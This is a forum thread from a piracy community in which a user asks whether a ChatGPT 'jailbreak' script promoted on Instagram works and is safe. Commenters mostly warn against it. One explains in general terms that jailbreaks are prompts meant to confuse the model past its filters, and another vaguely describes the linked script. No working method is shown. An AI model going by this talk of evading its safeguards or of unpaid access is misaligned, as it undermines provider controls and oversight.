this post was submitted on 01 Jun 2025
-54 points (6.5% liked)

Piracy: ꜱᴀɪʟ ᴛʜᴇ ʜɪɢʜ ꜱᴇᴀꜱ

62519 readers
394 users here now

⚓ Dedicated to the discussion of digital piracy, including ethical problems and legal advancements.

Rules • Full Version

1. Posts must be related to the discussion of digital piracy

2. Don't request invites, trade, sell, or self-promote

3. Don't request or link to specific pirated titles, including DMs

4. Don't submit low-quality posts, be entitled, or harass others



Loot, Pillage, & Plunder

📜 c/Piracy Wiki (Community Edition):

🏴‍☠️ Other communities

FUCK ADOBE!

Torrenting/P2P:

Gaming:


💰 Please help cover server costs.

Ko-Fi Liberapay
Ko-fi Liberapay

founded 2 years ago
MODERATORS
 

Does it really work as explained and is the script really safe to download?

Sorry for the low effort post, I just want to know if this works. ChatGPT 4 is actually fun to use, I mean chatting with it about math is really fun and constructive.

all 16 comments
sorted by: hot top controversial new old
[–] nagaram@startrek.website 18 points 1 month ago (1 children)

I just assume anything that promises free stuff on Instagram reels is in fact a scam or a hack.

Also I'm not getting on that shit site to confirm it's true.

[–] zaknenou@lemmy.dbzer0.com 5 points 1 month ago (2 children)

I thought about reuploading the video here, but it would just take too much space in dbzer0

Don't waste the bandwidth. We won't watch it

[–] underline960@sh.itjust.works 3 points 1 month ago (1 children)

I'd have skimmed a transcript, but I noped out of Instagram reel.

[–] zaknenou@lemmy.dbzer0.com 2 points 1 month ago

unfortunately some details are in the visual part of the video, like picture of the js script suggested.

[–] DoucheBagMcSwag@lemmy.dbzer0.com 10 points 1 month ago* (last edited 1 month ago)

The only chat GPT jailbreak is prompts to confuse it into bypassing its filters. These work for a few weeks before being patched out by open AI

Do not use this script

[–] Kissaki@lemmy.dbzer0.com 6 points 1 month ago* (last edited 1 month ago) (1 children)

You could have at least transformed the inaccessible video form into text.

It seems like they're referring to https://github.com/Batlez/ChatGPT-Jailbroken/, where you can check the source code.

To me it looks like all that does is make some kind of placeholder replacement, and there's some kind of custom prompt storage and retrieval.

Either way, if it does what you expect it to, doing more than intended by the service provider, it only works until they fix some checks or make some UI changes, and they may hold you accountable for evading technical measures to gain more than you subscribed (and paid) for.

Personally, I wouldn't trust integrating a random third party logic on a registered service. At the very least, I would disable auto-updating or copy/fork it.

I don't see them claiming it being "safe to download". I assume you're taking the implication or assumption as advocation and a safety assessment.

Depending on what you mean by "safe", no it's not safe.

I'm not familiar with the ChatGPT service in particular.

[–] zaknenou@lemmy.dbzer0.com 1 points 1 month ago* (last edited 1 month ago)

hmm, I'm not really that interested about the jailbreak part since I don't ask about politics that much, I use other resources for that.
I'm mainly asking about the GPT-4o access part, if that's real then, it's actually big thing.

the Github page also claims that it achieves this, but I can't understand Javascript to verify myself.

[–] Grandwolf319@sh.itjust.works 3 points 1 month ago

Got paywalled, should have known better given it’s an Instagram link